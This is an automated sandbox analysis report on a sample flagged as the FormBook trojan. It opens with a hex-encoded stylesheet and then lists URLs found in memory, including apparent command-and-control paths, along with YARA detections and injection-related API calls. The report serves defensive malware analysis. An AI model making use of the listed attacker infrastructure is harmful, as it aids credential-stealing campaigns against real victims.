20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: print.exe, 00000010.00000002.4497033740.0000000003E92000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003A82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://schema.org
                    Source: UnmxRI.exe, 00000000.00000002.2086201250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, tehuvFgZlLZK.exe, 0000000A.00000002.2169047373.00000000026E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: print.exe, 00000010.00000002.4497033740.000000000384A000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.000000000343A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ww1.nexgen-gaming.com
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ListingZen.com
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.noobblaster.com
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.noobblaster.com/fgkz/
                    Source: print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004712000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6J
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/assets/jquery/dist/jquery.min.js
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/assets/materialize/dist/js/materialize.min.js
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/assets/pusher-js/dist/web/pusher.js
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/build/css/compiled/backend/backend-f2bf381915.css
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/build/js/compiled/backend/app-56cea615a1.js
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/contact
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/faq
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/favicon.ico
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/img/site/dark_logo.png
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/img/site/dark_logo_250.jpg
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/img/site/light_icon.png
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/img/site/light_logo.png
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/js/compiled/unlogged/unlogged.js
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/login
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/marketplace
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/pricing
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/pricing#pricing
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/privacy
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/profile
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/register
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/sitemap.xml
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theranchobizarro.com/terms
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/icon?family=Material
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                    Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: print.exe, 00000010.00000002.4494834964.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: print.exe, 00000010.00000003.2441582614.0000000007123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
                    Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://performance.radar.cloudflare.com/beacon.js
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/listingzen/agents/agent4/450/agent1482359813.jpg
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/listingzen/vendors/vendor2/450/vendor1472074370.jpg
                    Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sparrow.cloudflare.com/api/v1/event
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://uk.pinterest.com/listingzen
                    Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing/
                    Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/login?utm_source=error_100x
                    Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
                    Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.listingzen.com/

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    .NET source code contains very large strings
                    Source: UnmxRI.exe, frmMain.csLong String: Length: 185344
                    Source: tehuvFgZlLZK.exe.0.dr, frmMain.csLong String: Length: 185344
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040B853 NtAllocateVirtualMemory,9_2_0040B853
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0040A943 NtCreateSection,9_2_0040A943
